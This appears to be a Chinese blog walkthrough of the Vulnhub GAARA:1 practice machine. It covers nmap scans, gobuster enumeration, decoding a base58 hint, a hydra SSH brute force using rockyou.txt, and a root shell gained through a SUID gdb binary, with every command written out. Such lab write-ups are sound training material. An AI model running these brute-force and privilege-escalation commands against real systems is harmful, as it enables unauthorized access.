Vulnhub:GAARA:1靶机

1.在浏览器中输入目标靶机IP地址,浏览网页
Vulnhub:GAARA:1靶机

2.端口扫描

nmap -p- 192.168.31.144
nmap -sC -sV -p 22,80 192.168.31.144

Vulnhub:GAARA:1靶机
3.目录枚举
扫描到一个Cryoserver目录,接下来在网页中打开

gobuster dir -u http://192.168.31.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Vulnhub:GAARA:1靶机
在浏览器中打开这个目录之后,在底部存在三个提示目录,接下来继续探索这三个目录
Vulnhub:GAARA:1靶机
在/iamGaara目录下发现了一串加密字符串
Vulnhub:GAARA:1靶机
请教过好大哥得知是base58加密,解密之后得到下面得内容;ssh登录失败,接下来尝试gaara作为用户名暴力破解
Vulnhub:GAARA:1靶机

4.暴力破解

hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.31.144 ssh

Vulnhub:GAARA:1靶机
5.ssh成功登录系统,查找拥有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

利用gdb这个文件可以成功获取root权限

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

Vulnhub:GAARA:1靶机

最后,谢谢大家伙百忙之中观看我的文章。

上一篇:vulnhub DC9 靶场练习


下一篇:vulnhub靶机 | DriftingBlues:7